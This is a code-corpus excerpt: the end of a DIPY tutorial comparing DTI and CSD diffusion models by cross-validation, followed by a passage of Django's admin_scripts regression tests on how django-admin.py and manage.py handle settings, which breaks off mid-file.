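The helper below is an illustrative aside added to this walk-through (it is not
part of the original example and is not used by it): a minimal sketch of how a
2-fold split of measurement indices could be built by hand. The function name
and sizes are hypothetical; xval.kfold_xval performs this split internally.
"""
def _kfold_split_sketch(n_measurements=160, k=2):
    order = np.random.permutation(n_measurements)  # shuffle measurement indices
    return np.array_split(order, k)  # each fold is held out once in turn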
"""
We fetch some data and select a couple of voxels to perform comparisons on. One
lies in the corpus callosum (cc), while the other is in the centrum semiovale
(cso), a part of the brain known to contain multiple crossing white matter
fiber populations.
"""
dpd.fetch_stanford_hardi()
img, gtab = dpd.read_stanford_hardi()
data = img.get_data()
cc_vox = data[40, 70, 38]
cso_vox = data[30, 76, 38]
"""
We initialize each kind of model:
"""
dti_model = dti.TensorModel(gtab)
response, ratio = csd.auto_response(gtab, data, roi_radius=10, fa_thr=0.7)
csd_model = csd.ConstrainedSphericalDeconvModel(gtab, response)
"""
Next, we perform cross-validation for each kind of model, comparing model
predictions to the diffusion MRI data in each one of these voxels.
Note that we use 2-fold cross-validation, which means that in each iteration,
the model will be fit to half of the data, and used to predict the other half.
"""
dti_cc = xval.kfold_xval(dti_model, cc_vox, 2)
csd_cc = xval.kfold_xval(csd_model, cc_vox, 2, response)
dti_cso = xval.kfold_xval(dti_model, cso_vox, 2)
csd_cso = xval.kfold_xval(csd_model, cso_vox, 2, response)
"""
We plot a scatter plot of the data with the model predictions in each of these
voxels, focusing only on the diffusion-weighted measurements (each point
corresponds to a different gradient direction). The two models are compared in
each sub-plot (blue=DTI, red=CSD).
"""
fig, ax = plt.subplots(1,2)
fig.set_size_inches([12,6])
ax[0].plot(cc_vox[~gtab.b0s_mask], dti_cc[~gtab.b0s_mask], 'o', color='b')
ax[0].plot(cc_vox[~gtab.b0s_mask], csd_cc[~gtab.b0s_mask], 'o', color='r')
ax[1].plot(cso_vox[~gtab.b0s_mask], dti_cso[~gtab.b0s_mask], 'o', color='b', label='DTI')
ax[1].plot(cso_vox[~gtab.b0s_mask], csd_cso[~gtab.b0s_mask], 'o', color='r', label='CSD')
plt.legend(loc='upper left')
for this_ax in ax:
this_ax.set_xlabel('Data (relative to S0)')
this_ax.set_ylabel('Model prediction (relative to S0)')
fig.savefig("model_predictions.png")
"""
.. figure:: model_predictions.png
:align: center
**Model predictions**.
"""
"""
We can also quantify the goodness of fit of the models by calculating an
R-squared score:
"""
cc_dti_r2=stats.pearsonr(cc_vox[~gtab.b0s_mask], dti_cc[~gtab.b0s_mask])[0]**2
cc_csd_r2=stats.pearsonr(cc_vox[~gtab.b0s_mask], csd_cc[~gtab.b0s_mask])[0]**2
cso_dti_r2=stats.pearsonr(cso_vox[~gtab.b0s_mask], dti_cso[~gtab.b0s_mask])[0]**2
cso_csd_r2=stats.pearsonr(cso_vox[~gtab.b0s_mask], csd_cso[~gtab.b0s_mask])[0]**2
print("Corpus callosum\n"
"DTI R2 : %s\n"
"CSD R2 : %s\n"
"\n"
"Centrum Semiovale\n"
"DTI R2 : %s\n"
"CSD R2 : %s\n" % (cc_dti_r2, cc_csd_r2, cso_dti_r2, cso_csd_r2))
"""
This should look something like this::
Corpus callosum
DTI R2 : 0.782881752597
CSD R2 : 0.805764364116
Centrum Semiovale
DTI R2 : 0.431921832012
CSD R2 : 0.604806420501
As you can see, DTI is a pretty good model for describing the signal in the CC,
while CSD is much better in describing the signal in regions of multiple
crossing fibers.
References
----------
.. [Hastie2008] Hastie, T., Tibshirani, R., Friedman, J. (2008). The Elements
of Statistical Learning: Data Mining, Inference and
Prediction. Springer-Verlag, Berlin
.. [Rokem2014] Rokem, A., Chan, K.L. Yeatman, J.D., Pestilli, F., Mezer, A.,
Wandell, B.A., 2014. Evaluating the accuracy of diffusion models at multiple
b-values with cross-validation. ISMRM 2014.
.. include:: ../links_names.inc
"""
| bsd-2-clause | -1,150,741,619,367,538,800 | 30.914773 | 89 | 0.713904 | false |
eneldoserrata/marcos_openerp | addons/report_geraldo/lib/geraldo/site/newsite/django_1_0/tests/regressiontests/admin_scripts/tests.py | 9 | 44012 | """
A series of tests to establish that the command-line management tools work as
advertised - especially with regard to the handling of the DJANGO_SETTINGS_MODULE
and default settings.py files.
"""
import os
import unittest
import shutil
import sys
from django import conf, bin, get_version
from django.conf import settings
class AdminScriptTestCase(unittest.TestCase):
def write_settings(self, filename, apps=None):
test_dir = os.path.dirname(os.path.dirname(__file__))
settings_file = open(os.path.join(test_dir,filename), 'w')
settings_file.write('# Settings file automatically generated by regressiontests.admin_scripts test case\n')
exports = [
'DATABASE_ENGINE',
'DATABASE_NAME',
'DATABASE_USER',
'DATABASE_PASSWORD',
'DATABASE_HOST',
'DATABASE_PORT',
'ROOT_URLCONF'
]
for s in exports:
if hasattr(settings,s):
settings_file.write("%s = '%s'\n" % (s, str(getattr(settings,s))))
if apps is None:
apps = ['django.contrib.auth', 'django.contrib.contenttypes', 'admin_scripts']
if apps:
settings_file.write("INSTALLED_APPS = %s\n" % apps)
settings_file.close()
def remove_settings(self, filename):
test_dir = os.path.dirname(os.path.dirname(__file__))
os.remove(os.path.join(test_dir, filename))
# Also try to remove the pyc file; if it exists, it could
# mess up later tests that depend upon the .py file not existing
try:
os.remove(os.path.join(test_dir, filename + 'c'))
except OSError:
pass
def run_test(self, script, args, settings_file=None, apps=None):
test_dir = os.path.dirname(os.path.dirname(__file__))
project_dir = os.path.dirname(test_dir)
base_dir = os.path.dirname(project_dir)
# Build the command line
cmd = '%s "%s"' % (sys.executable, script)
cmd += ''.join([' %s' % arg for arg in args])
# Remember the old environment
old_django_settings_module = os.environ.get('DJANGO_SETTINGS_MODULE', None)
old_python_path = os.environ.get('PYTHONPATH', None)
old_cwd = os.getcwd()
# Set the test environment
if settings_file:
os.environ['DJANGO_SETTINGS_MODULE'] = settings_file
elif 'DJANGO_SETTINGS_MODULE' in os.environ:
del os.environ['DJANGO_SETTINGS_MODULE']
os.environ['PYTHONPATH'] = os.pathsep.join([test_dir,base_dir])
# Move to the test directory and run
os.chdir(test_dir)
stdin, stdout, stderr = os.popen3(cmd)
out, err = stdout.read(), stderr.read()
# Restore the old environment
if old_django_settings_module:
os.environ['DJANGO_SETTINGS_MODULE'] = old_django_settings_module
if old_python_path:
os.environ['PYTHONPATH'] = old_python_path
# Move back to the old working directory
os.chdir(old_cwd)
return out, err
def run_django_admin(self, args, settings_file=None):
bin_dir = os.path.dirname(bin.__file__)
return self.run_test(os.path.join(bin_dir,'django-admin.py'), args, settings_file)
def run_manage(self, args, settings_file=None):
conf_dir = os.path.dirname(conf.__file__)
template_manage_py = os.path.join(conf_dir, 'project_template', 'manage.py')
test_dir = os.path.dirname(os.path.dirname(__file__))
test_manage_py = os.path.join(test_dir, 'manage.py')
shutil.copyfile(template_manage_py, test_manage_py)
stdout, stderr = self.run_test('./manage.py', args, settings_file)
# Cleanup - remove the generated manage.py script
os.remove(test_manage_py)
return stdout, stderr
def assertNoOutput(self, stream):
"Utility assertion: assert that the given stream is empty"
self.assertEquals(len(stream), 0, "Stream should be empty: actually contains '%s'" % stream)
def assertOutput(self, stream, msg):
"Utility assertion: assert that the given message exists in the output"
self.failUnless(msg in stream, "'%s' does not match actual output text '%s'" % (msg, stream))
##########################################################################
# DJANGO ADMIN TESTS
# This first series of test classes checks the environment processing
# of the django-admin.py script
##########################################################################
class DjangoAdminNoSettings(AdminScriptTestCase):
"A series of tests for django-admin.py when there is no settings.py file."
def test_builtin_command(self):
"no settings: django-admin builtin commands fail with an import error when no settings provided"
args = ['sqlall','admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, 'environment variable DJANGO_SETTINGS_MODULE is undefined')
def test_builtin_with_bad_settings(self):
"no settings: django-admin builtin commands fail if settings file (from argument) doesn't exist"
args = ['sqlall','--settings=bad_settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "Could not import settings 'bad_settings'")
def test_builtin_with_bad_environment(self):
"no settings: django-admin builtin commands fail if settings file (from environment) doesn't exist"
args = ['sqlall','admin_scripts']
out, err = self.run_django_admin(args,'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "Could not import settings 'bad_settings'")
class DjangoAdminDefaultSettings(AdminScriptTestCase):
"""A series of tests for django-admin.py when using a settings.py file that
contains the test application.
"""
def setUp(self):
self.write_settings('settings.py')
def tearDown(self):
self.remove_settings('settings.py')
def test_builtin_command(self):
"default: django-admin builtin commands fail with an import error when no settings provided"
args = ['sqlall','admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, 'environment variable DJANGO_SETTINGS_MODULE is undefined')
def test_builtin_with_settings(self):
"default: django-admin builtin commands succeed if settings are provided as argument"
args = ['sqlall','--settings=settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertOutput(out, 'CREATE TABLE')
def test_builtin_with_environment(self):
"default: django-admin builtin commands succeed if settings are provided in the environment"
args = ['sqlall','admin_scripts']
out, err = self.run_django_admin(args,'settings')
self.assertNoOutput(err)
self.assertOutput(out, 'CREATE TABLE')
def test_builtin_with_bad_settings(self):
"default: django-admin builtin commands fail if settings file (from argument) doesn't exist"
args = ['sqlall','--settings=bad_settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "Could not import settings 'bad_settings'")
def test_builtin_with_bad_environment(self):
"default: django-admin builtin commands fail if settings file (from environment) doesn't exist"
args = ['sqlall','admin_scripts']
out, err = self.run_django_admin(args,'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "Could not import settings 'bad_settings'")
def test_custom_command(self):
"default: django-admin can't execute user commands"
args = ['noargs_command']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
def test_custom_command_with_settings(self):
"default: django-admin can't execute user commands, even if settings are provided as argument"
args = ['noargs_command', '--settings=settings']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
def test_custom_command_with_environment(self):
"default: django-admin can't execute user commands, even if settings are provided in environment"
args = ['noargs_command']
out, err = self.run_django_admin(args,'settings')
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
class DjangoAdminMinimalSettings(AdminScriptTestCase):
"""A series of tests for django-admin.py when using a settings.py file that
doesn't contain the test application.
"""
def setUp(self):
self.write_settings('settings.py', apps=['django.contrib.auth','django.contrib.contenttypes'])
def tearDown(self):
self.remove_settings('settings.py')
def test_builtin_command(self):
"minimal: django-admin builtin commands fail with an import error when no settings provided"
args = ['sqlall','admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, 'environment variable DJANGO_SETTINGS_MODULE is undefined')
def test_builtin_with_settings(self):
"minimal: django-admin builtin commands fail if settings are provided as argument"
args = ['sqlall','--settings=settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, 'App with label admin_scripts could not be found')
def test_builtin_with_environment(self):
"minimal: django-admin builtin commands fail if settings are provided in the environment"
args = ['sqlall','admin_scripts']
out, err = self.run_django_admin(args,'settings')
self.assertNoOutput(out)
self.assertOutput(err, 'App with label admin_scripts could not be found')
def test_builtin_with_bad_settings(self):
"minimal: django-admin builtin commands fail if settings file (from argument) doesn't exist"
args = ['sqlall','--settings=bad_settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "Could not import settings 'bad_settings'")
def test_builtin_with_bad_environment(self):
"minimal: django-admin builtin commands fail if settings file (from environment) doesn't exist"
args = ['sqlall','admin_scripts']
out, err = self.run_django_admin(args,'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "Could not import settings 'bad_settings'")
def test_custom_command(self):
"minimal: django-admin can't execute user commands"
args = ['noargs_command']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
def test_custom_command_with_settings(self):
"minimal: django-admin can't execute user commands, even if settings are provided as argument"
args = ['noargs_command', '--settings=settings']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
def test_custom_command_with_environment(self):
"minimal: django-admin can't execute user commands, even if settings are provided in environment"
args = ['noargs_command']
out, err = self.run_django_admin(args,'settings')
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
class DjangoAdminAlternateSettings(AdminScriptTestCase):
"""A series of tests for django-admin.py when using a settings file
with a name other than 'settings.py'.
"""
def setUp(self):
self.write_settings('alternate_settings.py')
def tearDown(self):
self.remove_settings('alternate_settings.py')
def test_builtin_command(self):
"alternate: django-admin builtin commands fail with an import error when no settings provided"
args = ['sqlall','admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, 'environment variable DJANGO_SETTINGS_MODULE is undefined')
def test_builtin_with_settings(self):
"alternate: django-admin builtin commands succeed if settings are provided as argument"
args = ['sqlall','--settings=alternate_settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertOutput(out, 'CREATE TABLE')
def test_builtin_with_environment(self):
"alternate: django-admin builtin commands succeed if settings are provided in the environment"
args = ['sqlall','admin_scripts']
out, err = self.run_django_admin(args,'alternate_settings')
self.assertNoOutput(err)
self.assertOutput(out, 'CREATE TABLE')
def test_builtin_with_bad_settings(self):
"alternate: django-admin builtin commands fail if settings file (from argument) doesn't exist"
args = ['sqlall','--settings=bad_settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "Could not import settings 'bad_settings'")
def test_builtin_with_bad_environment(self):
"alternate: django-admin builtin commands fail if settings file (from environment) doesn't exist"
args = ['sqlall','admin_scripts']
out, err = self.run_django_admin(args,'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "Could not import settings 'bad_settings'")
def test_custom_command(self):
"alternate: django-admin can't execute user commands"
args = ['noargs_command']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
def test_custom_command_with_settings(self):
"alternate: django-admin can't execute user commands, even if settings are provided as argument"
args = ['noargs_command', '--settings=alternate_settings']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
def test_custom_command_with_environment(self):
"alternate: django-admin can't execute user commands, even if settings are provided in environment"
args = ['noargs_command']
out, err = self.run_django_admin(args,'alternate_settings')
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
class DjangoAdminMultipleSettings(AdminScriptTestCase):
"""A series of tests for django-admin.py when multiple settings files
(including the default 'settings.py') are available. The default settings
file is insufficient for performing the operations described, so the
alternate settings must be used by the running script.
"""
def setUp(self):
self.write_settings('settings.py', apps=['django.contrib.auth','django.contrib.contenttypes'])
self.write_settings('alternate_settings.py')
def tearDown(self):
self.remove_settings('settings.py')
self.remove_settings('alternate_settings.py')
def test_builtin_command(self):
"alternate: django-admin builtin commands fail with an import error when no settings provided"
args = ['sqlall','admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, 'environment variable DJANGO_SETTINGS_MODULE is undefined')
def test_builtin_with_settings(self):
"alternate: django-admin builtin commands succeed if settings are provided as argument"
args = ['sqlall','--settings=alternate_settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertOutput(out, 'CREATE TABLE')
def test_builtin_with_environment(self):
"alternate: django-admin builtin commands succeed if settings are provided in the environment"
args = ['sqlall','admin_scripts']
out, err = self.run_django_admin(args,'alternate_settings')
self.assertNoOutput(err)
self.assertOutput(out, 'CREATE TABLE')
def test_builtin_with_bad_settings(self):
"alternate: django-admin builtin commands fail if settings file (from argument) doesn't exist"
args = ['sqlall','--settings=bad_settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertOutput(err, "Could not import settings 'bad_settings'")
def test_builtin_with_bad_environment(self):
"alternate: django-admin builtin commands fail if settings file (from environment) doesn't exist"
args = ['sqlall','admin_scripts']
out, err = self.run_django_admin(args,'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "Could not import settings 'bad_settings'")
def test_custom_command(self):
"alternate: django-admin can't execute user commands"
args = ['noargs_command']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
def test_custom_command_with_settings(self):
"alternate: django-admin can't execute user commands, even if settings are provided as argument"
args = ['noargs_command', '--settings=alternate_settings']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
def test_custom_command_with_environment(self):
"alternate: django-admin can't execute user commands, even if settings are provided in environment"
args = ['noargs_command']
out, err = self.run_django_admin(args,'alternate_settings')
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
##########################################################################
# MANAGE.PY TESTS
# This next series of test classes checks the environment processing
# of the generated manage.py script
##########################################################################
class ManageNoSettings(AdminScriptTestCase):
"A series of tests for manage.py when there is no settings.py file."
def test_builtin_command(self):
"no settings: manage.py builtin commands fail with an import error when no settings provided"
args = ['sqlall','admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "Can't find the file 'settings.py' in the directory containing './manage.py'")
def test_builtin_with_bad_settings(self):
"no settings: manage.py builtin commands fail if settings file (from argument) doesn't exist"
args = ['sqlall','--settings=bad_settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "Can't find the file 'settings.py' in the directory containing './manage.py'")
def test_builtin_with_bad_environment(self):
"no settings: manage.py builtin commands fail if settings file (from environment) doesn't exist"
args = ['sqlall','admin_scripts']
out, err = self.run_manage(args,'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "Can't find the file 'settings.py' in the directory containing './manage.py'")
class ManageDefaultSettings(AdminScriptTestCase):
"""A series of tests for manage.py when using a settings.py file that
contains the test application.
"""
def setUp(self):
self.write_settings('settings.py')
def tearDown(self):
self.remove_settings('settings.py')
def test_builtin_command(self):
"default: manage.py builtin commands succeed when default settings are appropriate"
args = ['sqlall','admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, 'CREATE TABLE')
def test_builtin_with_settings(self):
"default: manage.py builtin commands succeed if settings are provided as argument"
args = ['sqlall','--settings=settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, 'CREATE TABLE')
def test_builtin_with_environment(self):
"default: manage.py builtin commands succeed if settings are provided in the environment"
args = ['sqlall','admin_scripts']
out, err = self.run_manage(args,'settings')
self.assertNoOutput(err)
self.assertOutput(out, 'CREATE TABLE')
def test_builtin_with_bad_settings(self):
"default: manage.py builtin commands succeed if settings file (from argument) doesn't exist"
args = ['sqlall','--settings=bad_settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "Could not import settings 'bad_settings'")
def test_builtin_with_bad_environment(self):
"default: manage.py builtin commands fail if settings file (from environment) doesn't exist"
args = ['sqlall','admin_scripts']
out, err = self.run_manage(args,'bad_settings')
self.assertNoOutput(err)
self.assertOutput(out, 'CREATE TABLE')
def test_custom_command(self):
"default: manage.py can execute user commands when default settings are appropriate"
args = ['noargs_command']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:NoArgsCommand")
def test_custom_command_with_settings(self):
"default: manage.py can execute user commands when settings are provided as argument"
args = ['noargs_command', '--settings=settings']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:NoArgsCommand")
def test_custom_command_with_environment(self):
"default: manage.py can execute user commands when settings are provided in environment"
args = ['noargs_command']
out, err = self.run_manage(args,'settings')
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:NoArgsCommand")
class ManageMinimalSettings(AdminScriptTestCase):
"""A series of tests for manage.py when using a settings.py file that
doesn't contain the test application.
"""
def setUp(self):
self.write_settings('settings.py', apps=['django.contrib.auth','django.contrib.contenttypes'])
def tearDown(self):
self.remove_settings('settings.py')
def test_builtin_command(self):
"minimal: manage.py builtin commands fail with an import error when no settings provided"
args = ['sqlall','admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, 'App with label admin_scripts could not be found')
def test_builtin_with_settings(self):
"minimal: manage.py builtin commands fail if settings are provided as argument"
args = ['sqlall','--settings=settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, 'App with label admin_scripts could not be found')
def test_builtin_with_environment(self):
"minimal: manage.py builtin commands fail if settings are provided in the environment"
args = ['sqlall','admin_scripts']
out, err = self.run_manage(args,'settings')
self.assertNoOutput(out)
self.assertOutput(err, 'App with label admin_scripts could not be found')
def test_builtin_with_bad_settings(self):
"minimal: manage.py builtin commands fail if settings file (from argument) doesn't exist"
args = ['sqlall','--settings=bad_settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "Could not import settings 'bad_settings'")
def test_builtin_with_bad_environment(self):
"minimal: manage.py builtin commands fail if settings file (from environment) doesn't exist"
args = ['sqlall','admin_scripts']
out, err = self.run_manage(args,'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, 'App with label admin_scripts could not be found')
def test_custom_command(self):
"minimal: manage.py can't execute user commands without appropriate settings"
args = ['noargs_command']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
def test_custom_command_with_settings(self):
"minimal: manage.py can't execute user commands, even if settings are provided as argument"
args = ['noargs_command', '--settings=settings']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
def test_custom_command_with_environment(self):
"minimal: manage.py can't execute user commands, even if settings are provided in environment"
args = ['noargs_command']
out, err = self.run_manage(args,'settings')
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
class ManageAlternateSettings(AdminScriptTestCase):
"""A series of tests for manage.py when using a settings file
with a name other than 'settings.py'.
"""
def setUp(self):
self.write_settings('alternate_settings.py')
def tearDown(self):
self.remove_settings('alternate_settings.py')
def test_builtin_command(self):
"alternate: manage.py builtin commands fail with an import error when no default settings provided"
args = ['sqlall','admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "Can't find the file 'settings.py' in the directory containing './manage.py'")
def test_builtin_with_settings(self):
"alternate: manage.py builtin commands fail if settings are provided as argument but no defaults"
args = ['sqlall','--settings=alternate_settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "Can't find the file 'settings.py' in the directory containing './manage.py'")
def test_builtin_with_environment(self):
"alternate: manage.py builtin commands fail if settings are provided in the environment but no defaults"
args = ['sqlall','admin_scripts']
out, err = self.run_manage(args,'alternate_settings')
self.assertNoOutput(out)
self.assertOutput(err, "Can't find the file 'settings.py' in the directory containing './manage.py'")
def test_builtin_with_bad_settings(self):
"alternate: manage.py builtin commands fail if settings file (from argument) doesn't exist"
args = ['sqlall','--settings=bad_settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "Can't find the file 'settings.py' in the directory containing './manage.py'")
def test_builtin_with_bad_environment(self):
"alternate: manage.py builtin commands fail if settings file (from environment) doesn't exist"
args = ['sqlall','admin_scripts']
out, err = self.run_manage(args,'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "Can't find the file 'settings.py' in the directory containing './manage.py'")
def test_custom_command(self):
"alternate: manage.py can't execute user commands"
args = ['noargs_command']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "Can't find the file 'settings.py' in the directory containing './manage.py'")
def test_custom_command_with_settings(self):
"alternate: manage.py can't execute user commands, even if settings are provided as argument"
args = ['noargs_command', '--settings=alternate_settings']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "Can't find the file 'settings.py' in the directory containing './manage.py'")
def test_custom_command_with_environment(self):
"alternate: manage.py can't execute user commands, even if settings are provided in environment"
args = ['noargs_command']
out, err = self.run_manage(args,'alternate_settings')
self.assertNoOutput(out)
self.assertOutput(err, "Can't find the file 'settings.py' in the directory containing './manage.py'")
class ManageMultipleSettings(AdminScriptTestCase):
"""A series of tests for manage.py when multiple settings files
(including the default 'settings.py') are available. The default settings
file is insufficient for performing the operations described, so the
alternate settings must be used by the running script.
"""
def setUp(self):
self.write_settings('settings.py', apps=['django.contrib.auth','django.contrib.contenttypes'])
self.write_settings('alternate_settings.py')
def tearDown(self):
self.remove_settings('settings.py')
self.remove_settings('alternate_settings.py')
def test_builtin_command(self):
"multiple: manage.py builtin commands fail with an import error when no settings provided"
args = ['sqlall','admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, 'App with label admin_scripts could not be found.')
def test_builtin_with_settings(self):
"multiple: manage.py builtin commands succeed if settings are provided as argument"
args = ['sqlall','--settings=alternate_settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, 'CREATE TABLE')
def test_builtin_with_environment(self):
"multiple: manage.py builtin commands fail if settings are provided in the environment"
# FIXME: This doesn't seem to be the correct output.
args = ['sqlall','admin_scripts']
out, err = self.run_manage(args,'alternate_settings')
self.assertNoOutput(out)
self.assertOutput(err, 'App with label admin_scripts could not be found.')
def test_builtin_with_bad_settings(self):
"multiple: manage.py builtin commands fail if settings file (from argument) doesn't exist"
args = ['sqlall','--settings=bad_settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "Could not import settings 'bad_settings'")
def test_builtin_with_bad_environment(self):
"multiple: manage.py builtin commands fail if settings file (from environment) doesn't exist"
args = ['sqlall','admin_scripts']
out, err = self.run_manage(args,'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "App with label admin_scripts could not be found")
def test_custom_command(self):
"multiple: manage.py can't execute user commands using default settings"
args = ['noargs_command']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
def test_custom_command_with_settings(self):
"multiple: manage.py can execute user commands if settings are provided as argument"
args = ['noargs_command', '--settings=alternate_settings']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:NoArgsCommand")
def test_custom_command_with_environment(self):
"multiple: manage.py can execute user commands if settings are provided in environment"
args = ['noargs_command']
out, err = self.run_manage(args,'alternate_settings')
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
##########################################################################
# COMMAND PROCESSING TESTS
# Check that user-space commands are correctly handled - in particular,
# that arguments to the commands are correctly parsed and processed.
##########################################################################
class CommandTypes(AdminScriptTestCase):
"Tests for the various types of base command types that can be defined."
def setUp(self):
self.write_settings('settings.py')
def tearDown(self):
self.remove_settings('settings.py')
def test_version(self):
"--version is handled as a special case"
args = ['--version']
out, err = self.run_manage(args)
self.assertNoOutput(err)
# Only check the first part of the version number
self.assertOutput(out, get_version().split('-')[0])
def test_help(self):
"--help is handled as a special case"
args = ['--help']
out, err = self.run_manage(args)
if sys.version_info < (2, 5):
self.assertOutput(out, "usage: manage.py [options]")
else:
self.assertOutput(out, "Usage: manage.py [options]")
self.assertOutput(err, "Type 'manage.py help <subcommand>' for help on a specific subcommand.")
def test_specific_help(self):
"--help can be used on a specific command"
args = ['sqlall','--help']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "Prints the CREATE TABLE, custom SQL and CREATE INDEX SQL statements for the given model module name(s).")
def test_base_command(self):
"User BaseCommands can execute when a label is provided"
args = ['base_command','testlabel']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:BaseCommand labels=('testlabel',), options=[('option_a', '1'), ('option_b', '2'), ('option_c', '3'), ('pythonpath', None), ('settings', None), ('traceback', None)]")
def test_base_command_no_label(self):
"User BaseCommands can execute when no labels are provided"
args = ['base_command']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:BaseCommand labels=(), options=[('option_a', '1'), ('option_b', '2'), ('option_c', '3'), ('pythonpath', None), ('settings', None), ('traceback', None)]")
def test_base_command_multiple_label(self):
"User BaseCommands can execute when no labels are provided"
args = ['base_command','testlabel','anotherlabel']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:BaseCommand labels=('testlabel', 'anotherlabel'), options=[('option_a', '1'), ('option_b', '2'), ('option_c', '3'), ('pythonpath', None), ('settings', None), ('traceback', None)]")
def test_base_command_with_option(self):
"User BaseCommands can execute with options when a label is provided"
args = ['base_command','testlabel','--option_a=x']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:BaseCommand labels=('testlabel',), options=[('option_a', 'x'), ('option_b', '2'), ('option_c', '3'), ('pythonpath', None), ('settings', None), ('traceback', None)]")
def test_base_command_with_options(self):
"User BaseCommands can execute with multiple options when a label is provided"
args = ['base_command','testlabel','-a','x','--option_b=y']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:BaseCommand labels=('testlabel',), options=[('option_a', 'x'), ('option_b', 'y'), ('option_c', '3'), ('pythonpath', None), ('settings', None), ('traceback', None)]")
def test_noargs(self):
"NoArg Commands can be executed"
args = ['noargs_command']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:NoArgsCommand options=[('pythonpath', None), ('settings', None), ('traceback', None)]")
def test_noargs_with_args(self):
